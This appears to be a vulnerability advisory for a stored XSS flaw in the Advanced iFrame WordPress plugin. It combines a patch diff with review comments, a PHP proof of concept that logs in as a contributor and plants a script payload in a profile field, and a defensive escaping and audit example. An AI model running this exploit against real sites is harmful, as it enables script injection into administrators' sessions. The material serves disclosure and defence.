-  printHeightNumberInput(false, $devOptions, __('i-20-Additional height', 'advanced-iframe'), 'additional_height', __('If you like that the iframe is higher than the calculated value you can add some extra height here. This number is then added to the calculated one. This is e.g. needed if one of your tested browsers displays a scrollbar because of 1 or 2 pixel. Or you have an invisible area that is shown by the click on a button that can increase the size of the page. This option is NOT possible when "Store height in cookie" is enabled because this would cause that the height will increase at each reload of the parent page. If you use several iframes please use the same setting for all of them because there is only one global variable. Shortcode attribute: additional_height=""', 'advanced-iframe'));
+  printHeightNumberInput(false, $devOptions, __('i-20-Additional height', 'advanced-iframe'), 'additional_height', __('If you like that the iframe is higher than the calculated value you can add some extra height here. This number is then added to the calculated one. This is e.g. needed if one of your tested browsers displays a scrollbar because of 1 or 2 pixel. Or you have an invisible area that is shown by the click on a button that can increase the size of the page. This option is NOT possible when "Store height in cookie" is enabled because this would cause that the height will increase at each reload of the parent page. If you use several iframes please use the same setting for all of them because there is only one global variable.  Shortcode attribute: additional_height=""', 'advanced-iframe'));
   printTrueFalse(false, $devOptions, __('i-20-Resize iframe to content width', 'advanced-iframe'), 'onload_resize_width', __('If you like that the iframe is resized to the width of the content you should set this to 'Yes'. PLEASE NOTE: Normally this is NOT what you want. Most people like a width of 100%! If you have a responsive layout this setting should be false. If your iframe has only a width of 1px disable the feature! Please note that this is done by Javascript and only in combination with resizing the content height! So if a user has Javascript deactivated or a not supported browser the iframe does not get resized. This setting generates the code onload="aiResizeIframe(this, 'true');" to the iframe. Shortcode attribute: onload_resize_width="true" or onload_resize_width="false" ', 'advanced-iframe'));
   if (!$evanto) {
     printNumberInput(false, $devOptions, __('i-20-Resize on click events', 'advanced-iframe'), 'resize_on_click', __('If you like that the iframe is resized after clicks  in the iframe please enter the timeout here. Otherwise leave this field empty. The number is the timeout in milliseconds until the resize is called. This setting intercepts the clicks on the element specified below. Catching happens BEFORE the actual action on e.g. the link. Therefore you need to enter a number > 0 because the original action is done later. 100 is a good value to start with! If you have e.g. a slide down effect you should add the time here it takes to get the full height. This setting does only work on the SAME domain by default. If you like to get this working across different domains use the "Resize on Element resize" feature of the pro version. Shortcode attribute: resize_on_click=""', 'advanced-iframe'));
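Review bot: The only change to the additional_height help string is a second space before "Shortcode attribute:", which alters the msgid passed to __() and so orphans existing translations of this long string without changing its meaning. Drop the extra space.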
--- a/advanced-iframe/includes/advanced-iframe-admin-zoom.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-zoom.php
@@ -7,7 +7,7 @@
   echo '<p>';
   _e('All major browsers do support the zoom of iframes. Depending on your setup you can use a static zoom factor or even automatic zoom which does zoom the content depending on the available space. Please check the examples how the different zoom settings do work. Please note that the zoom below does only zoom the iframe. When you use the "Show only a part of the iframe" the inner content is zoomed. For zoom options of the viewport please check the settings at "Show only a part of the iframe"', 'advanced-iframe');
   echo '</p><table class="form-table">';
-  printNumberInput(true, $devOptions, __('Zoom iframe', 'advanced-iframe'), 'iframe_zoom', __('You can zoom the content of the iframe with this setting. E.g. entering 0.5 does resize the iframe to 50%. At the iframe width and height you need to enter the FULL size of the iframe. So if you enter width = 1000, height = 500 and zoom = 0.5 than the result will be 500x250. The following browsers are supported: IE8-11, Firefox, Chrome, Safari, Opera, Edge. Older versions of IE are not supported. Please test all the browsers you want to support with your page because not all pages do look good in a zoomed mode! "Show only a part of an iframe" and "Resize iframe to content height" are supported. Shortcode attribute: iframe_zoom=""', 'advanced-iframe'), 'text', '', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/zoom-iframe-content');
+  printNumberInput(true, $devOptions, __('Zoom iframe', 'advanced-iframe'), 'iframe_zoom', __('You can zoom the content of the iframe with this setting. E.g. entering 0.5 does resize the iframe to 50%. At the iframe width and height you need to enter the FULL size of the iframe. So if you enter width = 1000, height = 500 and zoom = 0.5 than the result will be 500x250. "Show only a part of an iframe" and "Resize iframe to content height" are supported. Shortcode attribute: iframe_zoom=""', 'advanced-iframe'), 'text', '', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/zoom-iframe-content');
   printTrueFalse(true, $devOptions, __('i-20-Zoom absolute fix', 'advanced-iframe'), 'use_zoom_absolute_fix', __('Sometimes the zoom measurements need an additional position:absolute to work correctly. Only set this to true if the zooms does not work as expected. Shortcode attribute: use_zoom_absolute_fix="true" or use_zoom_absolute_fix="false"', 'advanced-iframe'));
   printSameRemote($devOptions, __('Auto zoom iframe', 'advanced-iframe'), 'auto_zoom', __('This feature does automatically calculates the needed zoom factor to fit the iframe page into the parent page. Especially when you have a responsive website but the remote website is not responsive this is the only way that the page in the iframe does also zoom. Many smartphones and tablets to automatically zoom the parent page but not the iframe page. So there this feature can also be used. This feature works on the same domain and if you are able to use the external workaround and use auto height there (otherwise the width does not get transferred). Shortcode attribute: auto_zoom="same", auto_zoom="remote" or auto_zoom="false" ', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/auto-zoom-iframe-content', true);
   printTextInput(true, $devOptions, __('i-20-Auto zoom by ratio', 'advanced-iframe'), 'auto_zoom_by_ratio', __('This setting can be used on the SAME domain if the height of the page cannot be measured but the ratio of the page is known. And if the width also cannot be measured automatically but is known because the iframe page has a fixed width, you can specify this width by adding with a pipe like ratio|width. E.g. 0.80|800. If you know the the ratio and the width, this setting does also work on REMOTE domains. You don't even need access to the remote domain! For remote domains also select SAME in the setting before as remote means that the height/width information is sent from the remote domain which is not the case here. Shortcode attribute: auto_zoom_by_ratio=""', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/auto-zoom-iframe-content#e35');
--- a/advanced-iframe/includes/advanced-iframe-main-css.php
+++ b/advanced-iframe/includes/advanced-iframe-main-css.php
@@ -278,7 +278,10 @@
     left: 0px;
     line-height: 1.2;
     font-size: 90%;
-    z-index: 999999;}';
+    z-index: 999999;
+	background-image: none !important;
+	background: none !important;
+	}';
 }

 if ($fullscreen_button !== 'false') {
--- a/advanced-iframe/includes/advanced-iframe-main-helper.php
+++ b/advanced-iframe/includes/advanced-iframe-main-helper.php
@@ -494,7 +494,11 @@
     return ($value === 'true' || $value === 'false') ? $value : 'false';
   }

-  static $replaceBasicXSS = array('"', "'", ' ', '(', ')', ';', '}');
+  static function filterXSSNumber($value) {
+    return preg_match('/^d+(?:[;,]d+)*$/', $value) ? $value : 0;
+  }
+
+  static $replaceBasicXSS = array('"', "'", ' ', '(', ')', ';', '}', 'onerror');

   static function filterBasicXSS($value) {
     return empty($value) ? '' : str_replace(static::$replaceBasicXSS, '', $value);
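Review bot: In filterXSSNumber() the pattern is shown as '/^d+(?:[;,]d+)*$/' with no backslash before either d, which as written matches the letter d rather than digits; confirm the source has \d in both places. Two further tightenings: $ also matches before a trailing newline, so use \z or the D modifier, and the function returns the integer 0 on failure but the original string on success, which any caller using === will see as two different types. The 'onerror' entry added to $replaceBasicXSS is one case-sensitive literal in a denylist; validating each setting against the format it expects, as filterXSSNumber and filterXSSTrueFalse do, is more dependable than growing that list.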
--- a/advanced-iframe/includes/advanced-iframe-main-iframe.php
+++ b/advanced-iframe/includes/advanced-iframe-main-iframe.php
@@ -133,7 +133,7 @@
       $hide_href = '';
 	  if ($num_values === 7 || $num_values === 8) {
         $display_type = 'a';
-        $hrefValue = esc_html(trim($values[6]));
+        $hrefValue = esc_url(trim($values[6]));
         if ($hrefValue === 'changeViewport') {
           $hide_href = ' href="javascript:setNewViewPort' . $id . '(0); "';
         } else {
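Review bot: $hrefValue now goes through esc_url() before the $hrefValue === 'changeViewport' comparison on the next line, and esc_url() prepends http:// to a value that has no scheme and does not start with /, # or ?, so the keyword branch can no longer match. Compare the trimmed raw value against 'changeViewport' first and apply esc_url() only in the else branch, where the value is used as a link target.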
@@ -369,7 +369,7 @@
   $html .= ' height="' . esc_html(trim($height)) . '" ';
   // html5 style to support vw and vh and we only add it if not present.
   if (strpos($style, 'height:') === false) {
-    $style .= 'height:' . esc_html(trim($this->addPx($height))) . ';';
+    $style .= ';height:' . esc_html(trim($this->addPx($height))) . ';';
   }
 }

--- a/advanced-iframe/includes/advanced-iframe-main-prepare.php
+++ b/advanced-iframe/includes/advanced-iframe-main-prepare.php
@@ -17,7 +17,8 @@
       return $html_js;
     }

-    static function aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled) {
+    static function aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled,
+	 $data_post_message,$add_iframe_url_as_param,$use_iframe_title_for_parent) {
       if ($use_post_message != 'false') {
         $iframe_origin_full = $src;

@@ -66,7 +67,9 @@
           $html_js .= trim(file_get_contents($post_js_filename_old));
           $html_js .= 'event = aiConvertPostMessage(event);';
         }
-        $html_js .= '  aiProcessMessage(event,"' . $id . '", "' . $use_post_message . '");';
+
+
+        $html_js .= '  aiProcessMessage(event,"' . $id . '", "' . $use_post_message . '","' .$data_post_message .'","' .$add_iframe_url_as_param .'","' .$use_iframe_title_for_parent .'");';
         $html_js .= '}';
         $html_js .= 'if (window.addEventListener) {';
         $html_js .= '  window.addEventListener("message", aiReceiveMessage' . $id . ');';
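Review bot: The rewritten aiProcessMessage(...) line concatenates $data_post_message, $add_iframe_url_as_param and $use_iframe_title_for_parent straight into double-quoted JavaScript string literals, and nothing in this hunk escapes them for that context. The read-config change in this patch adds data_post_message to the shortcode attributes, so it should be treated as author-controlled input: wrap each value in esc_js(), or emit it with wp_json_encode(), at this point rather than relying on filtering done elsewhere. The two blank lines added above the statement can be dropped.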
@@ -91,7 +94,7 @@
         $html_js .= 'var aiOnloadScrollTop="true";';
       }

-      if ($additional_height != 0) {
+      if (!empty($additional_height)) {
         $html_js .= 'var aiExtraSpace=' . esc_html($additional_height) . ';';
       }

@@ -530,7 +533,8 @@
   $html .= '<script type="text/javascript" src="' . plugins_url() . $aiPath . '/js/ai.min.js" ></script>';
 }
 $html_js = AdvancediFramePrepareJs::aiPrepareGlobalJsVariables($id, $include_scripts_in_content, $aiPath, $add_document_domain, $document_domain);
-$html_js = AdvancediFramePrepareJs::aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled);
+$html_js = AdvancediFramePrepareJs::aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled,
+    $data_post_message, $add_iframe_url_as_param, $use_iframe_title_for_parent);
 $html_js = AdvancediFramePrepareJs::aiPrepareAiJsVariables($html_js, $iframe_zoom, $show_part_of_iframe_zoom,
   $store_height_in_cookie, $id, $onload_scroll_top, $additional_height, $debug_js, $fullscreen_button_full);
 $html_js = AdvancediFramePrepareJs::aiPrepareAiShowIframeIdJs($html_js, $hide_part_of_iframe);
--- a/advanced-iframe/includes/advanced-iframe-main-read-config.php
+++ b/advanced-iframe/includes/advanced-iframe-main-read-config.php
@@ -74,11 +74,12 @@
     $use_shortcode_attributes_only = $options['use_shortcode_attributes_only'];
   }

-// version is always read.
+  // Settings which are always read.
   $version_counter = $options['version_counter'];
   $alternative_shortcode = $options['alternative_shortcode'];
   $use_post_message = $options['use_post_message'];
   $multi_domain_enabled = $options['multi_domain_enabled'];
+  $data_post_message = $options['data_post_message'];
   $demo = $options['demo'];
   $show_support_message = $options['show_support_message'];
   if ($_SERVER['HTTP_HOST'] == 'localhost' || $_SERVER['HTTP_HOST'] == '127.0.0.1') {
@@ -88,7 +89,7 @@

   $debug_js = AdvancedIframeHelper::check_debug_enabled($options['debug_js']);
   $check_shortcode = AdvancedIframeHelper::check_shortcode_enabled($options['check_shortcode']);
-
+
 // defaults from main config
   if ($use_shortcode_attributes_only === 'false' || $options['shortcode_attributes'] === 'false') {  //
     extract(array('securitykey' => 'not set',
@@ -388,7 +389,8 @@
         'loading' => $options['loading'],
         'referrerpolicy' => $options['referrerpolicy'],
         'add_surrounding_p' => $options['add_surrounding_p'],
-        'custom' => $options['custom']
+        'custom' => $options['custom'],
+		'data_post_message' => $options['data_post_message']
       )
       , $atts, 'advanced_iframe'));

@@ -701,9 +703,12 @@
 $add_iframe_url_as_param_direct = AdvancedIframeHelper::filterXSSTrueFalse($add_iframe_url_as_param_direct);
 $add_iframe_url_as_param_prefix = AdvancedIframeHelper::filterBasicXSS($add_iframe_url_as_param_prefix);
 $map_parameter_to_url = AdvancedIframeHelper::filterBasicXSS($map_parameter_to_url);
-$show_part_of_iframe_next_viewports = AdvancedIframeHelper::filterBasicXSS($show_part_of_iframe_next_viewports);
+$show_part_of_iframe_next_viewports = AdvancedIframeHelper::filterXSSNumber($show_part_of_iframe_next_viewports);
 $enable_responsive_iframe = AdvancedIframeHelper::filterXSSTrueFalse($enable_responsive_iframe);
 $show_part_of_iframe_zoom = AdvancedIframeHelper::filterXSSTrueFalse($show_part_of_iframe_zoom);
 $remove_elements_from_height = AdvancedIframeHelper::filterBasicXSS($remove_elements_from_height);
 $resize_on_element_resize = AdvancedIframeHelper::filterBasicXSS($resize_on_element_resize);
+$additional_height = AdvancedIframeHelper::filterXSSNumber($additional_height);
+$iframe_zoom = AdvancedIframeHelper::filterXSSNumber($iframe_zoom);
+$onload_scroll_top = AdvancedIframeHelper::filterXSSTrueFalse($onload_scroll_top);
 ?>
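Review bot: $iframe_zoom is now passed through filterXSSNumber(), whose pattern accepts only digit groups separated by ; or , and returns 0 otherwise, yet the zoom help text in this same patch tells users to enter values such as 0.5. A decimal zoom would be reset to 0 here; either allow an optional fractional part for this setting or give it its own validator. The same pattern lets a value like 1;2 through for $additional_height, which the prepare hunk writes unquoted after var aiExtraSpace=, so a single-integer check fits that field better. $data_post_message, newly added to the shortcode attributes, gets no filter in this block.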

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25453 - Advanced iFrame <= 2025.10 - Authenticated (Contributor+) Stored Cross-Site Scripting

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject into user profile field
$payload = '"><script>alert(document.domain)</script>';

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Get edit profile page to obtain nonce
$profile_url = $target_url . '/wp-admin/profile.php';
curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from profile page (simplified - real implementation would parse HTML)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Update user profile with malicious payload
// Inject into display_name field which appears in plugin's user info display
$update_data = array(
    'display_name' => $payload,
    'email' => 'attacker@example.com',
    'first_name' => 'Attacker',
    'last_name' => 'User',
    'nickname' => 'attacker',
    'submit' => 'Update Profile',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/profile.php'
);

curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($update_data));
$response = curl_exec($ch);

// Step 4: Trigger the XSS by accessing Advanced iFrame settings page
$iframe_settings_url = $target_url . '/wp-admin/admin.php?page=advanced-iframe';
curl_setopt($ch, CURLOPT_URL, $iframe_settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Check if payload is present in response
if (strpos($response, $payload) !== false) {
    echo "[+] Payload successfully injected. XSS will trigger when admin views Advanced iFrame settings.\n";
} else {
    echo "[-] Payload injection may have failed.\n";
}

curl_close($ch);
?>
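
For defenders, the following added example (not code from Atomic Edge or from the plugin) shows how the PoC's display_name value renders once both key and value are escaped, and flags stored profile fields that would be interpreted as markup if echoed raw. The render_user_row_* functions and esc_html_compat() are hypothetical stand-ins for the plugin's row output and for WordPress's esc_html(), and the profile array is constructed sample data.

```php
<?php
// Added example, not plugin code. esc_html_compat() approximates WordPress
// esc_html() with htmlspecialchars() so this file runs without WordPress.
function esc_html_compat(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical stand-in for the pre-patch row output described in the
// analysis: key and value are concatenated into HTML without escaping.
function render_user_row_unescaped(string $key, string $value): string {
    return '<tr><td>' . $key . '</td><td>' . $value . '</td></tr>';
}

// Hypothetical stand-in for the patched output: both sides are escaped
// before concatenation, so special characters become entities.
function render_user_row_escaped(string $key, string $value): string {
    return '<tr><td>' . esc_html_compat($key) . '</td><td>'
        . esc_html_compat($value) . '</td></tr>';
}

// Audit helper: return the fields whose key or value changes under HTML
// escaping, i.e. data that a raw echo would hand to the browser as markup.
// The returned values are already escaped, so they are safe to print.
function find_markup_fields(array $profile): array {
    $flagged = [];
    foreach ($profile as $key => $value) {
        $key = (string) $key;
        $value = is_scalar($value) ? (string) $value : (json_encode($value) ?: '');
        if (esc_html_compat($key) !== $key || esc_html_compat($value) !== $value) {
            $flagged[$key] = esc_html_compat($value);
        }
    }
    return $flagged;
}

// Constructed sample profile; display_name carries the PoC's test string.
$profile = [
    'user_login'   => 'contributor_user',
    'display_name' => '"><script>alert(document.domain)</script>',
    'nickname'     => 'attacker',
    'first_name'   => "O'Brien", // benign, but still changes under escaping
];

foreach (find_markup_fields($profile) as $field => $safe) {
    echo "review: {$field} => {$safe}\n";
}

// The patched-style row contains no live tag: the value is entity-encoded.
echo render_user_row_escaped('display_name', $profile['display_name']), "\n";
```

A benign value such as O'Brien is flagged alongside the test string, which is expected: the helper reports anything that depends on output escaping, and the reviewer decides which entries are hostile.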
